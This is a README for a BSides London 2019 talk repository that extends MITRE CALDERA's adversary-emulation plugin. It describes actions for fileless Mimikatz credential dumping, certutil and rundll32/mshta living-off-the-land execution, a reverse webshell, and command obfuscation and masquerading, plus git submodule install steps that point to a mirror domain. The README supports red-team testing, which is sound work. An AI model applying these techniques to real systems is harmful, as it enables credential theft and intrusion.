The Imitation Game: Attacker Emulation

BSides London 2019

This repo contains changes made to the Adversary Plugin repo for CALDERA 2.0.

Presentation

Slides: HTML and PDF

Video: Available here

Code changes

Files that were changed include:

• The following steps:
  • dump_creds, a fileless Mimikatz in PowerShell action using CustomCommandLine (see below);
  • certutil_download, which can download files using the Certutil LOLbin;
  • rundll32_execution, which can execute commands using the RunDLL32/MSHTA LOLbin;
  • webserver_install, which prepares a webserver installation (creates OPSoftware object, see below); and,
  • webshell_execution, which uses the above three actions to set up a reverse webshell.
• operation.py, which introduces OPSoftware, which is used by some of the above actions (to implement LOLbins); and,
• command.py, which introduces CustomCommandLine, which can obfuscate commands and apply masquerading.
  Note that this still a proof of concept, as it requires you to supply drop_file and file_g functions in order to make CALDERA aware of renamed binaries in case of masquerading. See e.g. dump_creds. This should be further optimised.

Installation

Make sure you have the most recent version of CALDERA (for instructions check the CALDERA repo).

You can either copy in the files manually to your caldera/plugins/adversary folder, or:

1. In the main caldera/ folder, run the following command:

   git config --file=.gitmodules -e

2. Update the plugins/adversary entry, pointing it to https://github.com/wietze/bsides-ldn-2019.git
   (or [email protected]:wietze/bsides-ldn-2019.git if you're using SSH)
3. Run the following command to update to the latest version of this repo:

    git submodule sync && git submodule update --remote --merge

If you want to return to the original MITRE repository, follow steps 1-3 again, but use https://github.com/mitre/adversary.git in step 2.
(or [email protected]:mitre/adversary.git if you're using SSH)